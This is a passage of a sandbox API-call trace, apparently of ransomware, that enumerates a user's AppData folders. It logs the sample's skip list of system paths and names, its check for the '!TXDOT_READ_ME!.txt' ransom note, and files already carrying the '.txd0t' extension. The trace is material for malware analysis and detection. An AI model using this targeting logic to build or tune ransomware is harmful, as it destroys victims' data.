returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0090.024] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow", psz2="\\", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\" [0090.024] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\", psz2="Sun", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun" [0090.024] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\windows\\system32\\") returned 0x0 [0090.024] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.024] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\windows\\system\\") returned 0x0 [0090.024] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.024] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.024] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\appdata\\local\\") returned 0x0 [0090.024] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun", lpSrch="\\appdata\\locallow\\") returned="\\AppData\\LocalLow\\Sun" [0090.024] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb07402a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0090.024] FindClose (in: hFindFile=0xec2130 | out: hFindFile=0xec2130) returned 1 [0090.024] GetProcessHeap () returned 0xe30000 [0090.024] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7a58 | out: hHeap=0xe30000) returned 1 [0090.024] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50687e9d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50687e9d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0090.024] StrCmpW (psz1="Roaming", psz2=".") returned 1 [0090.025] StrCmpW (psz1="Roaming", psz2="..") returned 1 [0090.025] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\AppData", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0090.025] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\" [0090.025] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\", psz2="Roaming", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\windows\\system32\\") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\windows\\system\\") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\appdata\\local\\") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\boot\\") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\perflogs\\") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\programdata\\") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\drivers\\") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\wsus\\") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="crypt_detect") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="cryptolocker") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="ransomware") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="C:\\WINDOWS") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.025] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming", lpSrch="C:\\Program Files") returned 0x0 [0090.025] GetProcessHeap () returned 0xe30000 [0090.025] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c0) returned 0xec7a58 [0090.025] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.025] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\*", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\*") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\*" [0090.025] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50687e9d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50687e9d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec26f0 [0090.026] StrCmpW (psz1=".", psz2=".") returned 0 [0090.026] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50687e9d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50687e9d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.026] StrCmpW (psz1="..", psz2=".") returned 1 [0090.026] StrCmpW (psz1="..", psz2="..") returned 0 [0090.026] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x501e95f1, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x501e95f1, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50235c0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.026] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.026] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.026] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.026] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.026] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt" [0090.026] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.026] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.026] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.026] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.026] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.026] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.026] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.026] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.026] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.026] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.026] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.026] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.026] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.026] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.026] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.026] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.026] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcddced0, ftCreationTime.dwHighDateTime=0x1d5e5d7, ftLastAccessTime.dwLowDateTime=0x2a0da5f0, ftLastAccessTime.dwHighDateTime=0x1d5edc7, ftLastWriteTime.dwLowDateTime=0x501c3632, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7888, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="0R6G zd4i6nTDGa8VNm.png.txd0t", cAlternateFileName="0R6GZD~1.TXD")) returned 1 [0090.026] StrCmpW (psz1="0R6G zd4i6nTDGa8VNm.png.txd0t", psz2=".") returned 1 [0090.026] StrCmpW (psz1="0R6G zd4i6nTDGa8VNm.png.txd0t", psz2="..") returned 1 [0090.026] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.026] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.027] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="0R6G zd4i6nTDGa8VNm.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png.txd0t" [0090.027] PathFindExtensionW (pszPath="0R6G zd4i6nTDGa8VNm.png.txd0t") returned=".txd0t" [0090.027] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.027] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x486e5280, ftCreationTime.dwHighDateTime=0x1d5e57d, ftLastAccessTime.dwLowDateTime=0x52499ce0, ftLastAccessTime.dwHighDateTime=0x1d5e381, ftLastWriteTime.dwLowDateTime=0x501c3632, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11832, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="3QaEJDzGG8TQ5z.rtf.txd0t", cAlternateFileName="3QAEJD~1.TXD")) returned 1 [0090.027] StrCmpW (psz1="3QaEJDzGG8TQ5z.rtf.txd0t", psz2=".") returned 1 [0090.027] StrCmpW (psz1="3QaEJDzGG8TQ5z.rtf.txd0t", psz2="..") returned 1 [0090.027] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.027] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.027] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="3QaEJDzGG8TQ5z.rtf.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf.txd0t" [0090.027] PathFindExtensionW (pszPath="3QaEJDzGG8TQ5z.rtf.txd0t") returned=".txd0t" [0090.027] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.027] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b42a0, ftCreationTime.dwHighDateTime=0x1d5ed72, ftLastAccessTime.dwLowDateTime=0xbc7247a0, ftLastAccessTime.dwHighDateTime=0x1d5ed6a, ftLastWriteTime.dwLowDateTime=0x501c3632, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcd4d, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="5hVk52ujjP2vb7epC7.xls.txd0t", cAlternateFileName="5HVK52~1.TXD")) returned 1 [0090.027] StrCmpW (psz1="5hVk52ujjP2vb7epC7.xls.txd0t", psz2=".") returned 1 [0090.027] StrCmpW (psz1="5hVk52ujjP2vb7epC7.xls.txd0t", psz2="..") returned 1 [0090.027] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.027] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.027] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="5hVk52ujjP2vb7epC7.xls.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\5hVk52ujjP2vb7epC7.xls.txd0t" [0090.027] PathFindExtensionW (pszPath="5hVk52ujjP2vb7epC7.xls.txd0t") returned=".txd0t" [0090.027] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.027] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0605780, ftCreationTime.dwHighDateTime=0x1d5ed04, ftLastAccessTime.dwLowDateTime=0x3c594790, ftLastAccessTime.dwHighDateTime=0x1d5e4c2, ftLastWriteTime.dwLowDateTime=0x50235c0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x253f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="8zg7I2Esm.docx.txd0t", cAlternateFileName="8ZG7I2~1.TXD")) returned 1 [0090.027] StrCmpW (psz1="8zg7I2Esm.docx.txd0t", psz2=".") returned 1 [0090.027] StrCmpW (psz1="8zg7I2Esm.docx.txd0t", psz2="..") returned 1 [0090.027] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.027] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.027] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="8zg7I2Esm.docx.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\8zg7I2Esm.docx.txd0t" [0090.027] PathFindExtensionW (pszPath="8zg7I2Esm.docx.txd0t") returned=".txd0t" [0090.027] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.027] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7b7983c6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0090.027] StrCmpW (psz1="Adobe", psz2=".") returned 1 [0090.027] StrCmpW (psz1="Adobe", psz2="..") returned 1 [0090.027] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.027] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.027] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Adobe", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe" [0090.028] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpSrch="\\windows\\system32\\") returned 0x0 [0090.028] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.028] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpSrch="\\windows\\system\\") returned 0x0 [0090.028] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.028] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Adobe" [0090.028] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81c41ba0, ftCreationTime.dwHighDateTime=0x1d5e0f5, ftLastAccessTime.dwLowDateTime=0x182069d0, ftLastAccessTime.dwHighDateTime=0x1d5e3b9, ftLastWriteTime.dwLowDateTime=0x5025be8f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13c0b, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="aNTcu_iQUI-LLKOyho.avi.txd0t", cAlternateFileName="ANTCU_~1.TXD")) returned 1 [0090.028] StrCmpW (psz1="aNTcu_iQUI-LLKOyho.avi.txd0t", psz2=".") returned 1 [0090.028] StrCmpW (psz1="aNTcu_iQUI-LLKOyho.avi.txd0t", psz2="..") returned 1 [0090.028] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.028] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.028] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="aNTcu_iQUI-LLKOyho.avi.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi.txd0t" [0090.028] PathFindExtensionW (pszPath="aNTcu_iQUI-LLKOyho.avi.txd0t") returned=".txd0t" [0090.028] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.028] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b9a3ff0, ftCreationTime.dwHighDateTime=0x1d5eeb7, ftLastAccessTime.dwLowDateTime=0x91ed70, ftLastAccessTime.dwHighDateTime=0x1d5e832, ftLastWriteTime.dwLowDateTime=0x50282069, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xfd3f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="c39tCHh.avi.txd0t", cAlternateFileName="C39TCH~1.TXD")) returned 1 [0090.028] StrCmpW (psz1="c39tCHh.avi.txd0t", psz2=".") returned 1 [0090.028] StrCmpW (psz1="c39tCHh.avi.txd0t", psz2="..") returned 1 [0090.028] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.028] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.028] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="c39tCHh.avi.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\c39tCHh.avi.txd0t" [0090.028] PathFindExtensionW (pszPath="c39tCHh.avi.txd0t") returned=".txd0t" [0090.028] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.028] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a7d2dc0, ftCreationTime.dwHighDateTime=0x1d5e3ad, ftLastAccessTime.dwLowDateTime=0x40bcd7c0, ftLastAccessTime.dwHighDateTime=0x1d5e68e, ftLastWriteTime.dwLowDateTime=0x50282069, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xe2cc, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="CjrpV8NWiwYR.png.txd0t", cAlternateFileName="CJRPV8~1.TXD")) returned 1 [0090.028] StrCmpW (psz1="CjrpV8NWiwYR.png.txd0t", psz2=".") returned 1 [0090.028] StrCmpW (psz1="CjrpV8NWiwYR.png.txd0t", psz2="..") returned 1 [0090.028] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.028] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.028] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="CjrpV8NWiwYR.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\CjrpV8NWiwYR.png.txd0t" [0090.028] PathFindExtensionW (pszPath="CjrpV8NWiwYR.png.txd0t") returned=".txd0t" [0090.028] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.028] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e009a0, ftCreationTime.dwHighDateTime=0x1d5e9e5, ftLastAccessTime.dwLowDateTime=0x8b112b50, ftLastAccessTime.dwHighDateTime=0x1d5ebd4, ftLastWriteTime.dwLowDateTime=0x502a827b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x130a9, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="CUCgHoAM.wav.txd0t", cAlternateFileName="CUCGHO~1.TXD")) returned 1 [0090.028] StrCmpW (psz1="CUCgHoAM.wav.txd0t", psz2=".") returned 1 [0090.028] StrCmpW (psz1="CUCgHoAM.wav.txd0t", psz2="..") returned 1 [0090.028] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0090.028] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0090.029] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", 